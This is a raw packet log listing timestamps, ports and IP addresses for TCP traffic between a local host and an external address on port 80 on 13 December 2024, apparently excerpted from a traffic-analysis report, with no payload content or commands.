Dec 13, 2024 18:53:54.884843111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.884886980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.885690928 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.885706902 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.885721922 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.885734081 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.885749102 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.885766983 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.887132883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.887161016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.887202978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.887960911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.887976885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.888004065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.888032913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.888703108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.889523983 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.889569998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.889905930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.891366005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.891413927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.891592979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.891616106 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.891634941 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.891665936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.892452002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.892493010 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.893295050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.893318892 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.893332005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.893336058 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.893357038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.893372059 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.894001961 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.894690990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.894742966 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.894790888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.894808054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.894834042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.894857883 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.895874977 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.896183968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.896230936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.896810055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.896852970 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.897799015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.897814035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.897841930 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.897851944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.898905993 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.898921967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.898936987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.898973942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.899000883 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.900801897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.900818110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.900866985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.901384115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.901400089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.901426077 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.901449919 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.902003050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.902019978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.902065039 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.903352976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.903398991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.903898954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.903914928 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.903940916 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.903958082 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.904443026 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.905363083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.905379057 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.905414104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.905441999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.905913115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.906541109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.906589985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.907102108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.907118082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.907150030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.907165051 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.908782959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.908806086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.908849955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.909178019 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.909221888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.909255028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.909291983 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.910970926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.910986900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.911030054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.911051989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.911068916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.911094904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.911118031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.912446976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.912461996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.912513018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.913058043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.913103104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.913881063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.915033102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.915049076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.915082932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.915107012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.915208101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.915225029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.915266991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.916393042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.916409969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.916454077 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.917206049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.917891026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.056304932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.056463003 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.056617022 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.056746960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.056792974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.056896925 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.056936026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.057301044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.057343960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.057996988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.058438063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.058478117 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.059012890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.059055090 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.059359074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.059401035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.060048103 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.060089111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.061064005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.061079979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.061106920 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.061119080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.061197042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.061237097 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.062184095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.063011885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.063029051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.063064098 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.063095093 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.063745975 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.064034939 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.064050913 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.064083099 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.064105988 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.065200090 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.065653086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.065709114 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.066195965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.066303968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.066346884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.067106962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.067264080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.067361116 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.067401886 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.068186045 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.068228006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.068567991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.068608999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.069119930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.069243908 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.069545984 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.069586992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.070123911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.070924997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.070965052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.071129084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.071144104 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.071197033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.071197033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.072221041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.072365046 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.072422981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.073117971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.073174000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.073374987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.073416948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.074187994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.074203968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.074248075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.075160027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.075206041 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.075265884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.075309038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.076225996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.076268911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.077300072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.077321053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.077348948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.077367067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.077434063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.077883005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.078165054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.078207970 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.079262972 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.079279900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.079308987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.079327106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.079391003 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.079441071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.080254078 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.080270052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.080308914 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.080321074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.081398964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.081856012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.081892014 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.081906080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.082258940 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.083183050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.083228111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.083337069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.083379984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.084057093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.084101915 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.084392071 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.084433079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.084580898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.084620953 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.085484028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.085500002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.085526943 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.085537910 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.086366892 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.086940050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.086982965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.087493896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.087537050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.087697029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.087735891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.088464022 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.088479042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.088505030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.088516951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.089476109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.089490891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.089533091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.090612888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.090944052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.090986013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.091624975 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.091641903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.091666937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.091691017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.092433929 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.092449903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.092490911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.093364954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.093408108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.093651056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.093693972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.094403028 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.094702005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.094746113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.095571995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.095613956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.095791101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.095832109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.096662998 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.096703053 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.097479105 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.097493887 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.097521067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.097533941 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.097619057 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.097877979 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.098658085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.098700047 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.099090099 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.099133015 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.099514008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.099558115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.099720001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.099756002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.100790024 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.100805998 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.100843906 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.100862026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.101710081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.101726055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.101772070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.102564096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.102649927 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.102694035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.103734016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.103770971 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.104579926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.104594946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.104623079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.104634047 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.104814053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.105365038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.105552912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.105597973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.105881929 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.106688023 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.106734991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.107654095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.107671022 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.107697964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.107719898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.107814074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.108870983 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.108912945 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.109335899 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.109376907 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.248651981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.248732090 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.248779058 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.248826027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.249090910 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.249136925 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.249176979 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.249217987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.250299931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.250341892 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.250370026 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.250408888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.251274109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.251291990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.251318932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.251331091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.252098083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.252140045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.252501965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.252542973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.253246069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.253285885 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.253524065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.253566980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.254209042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.254225016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.254252911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.254262924 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:55.255203009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.255219936 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:55.255244017 CET	49917	80	192.168.2.7	31.41.244.11
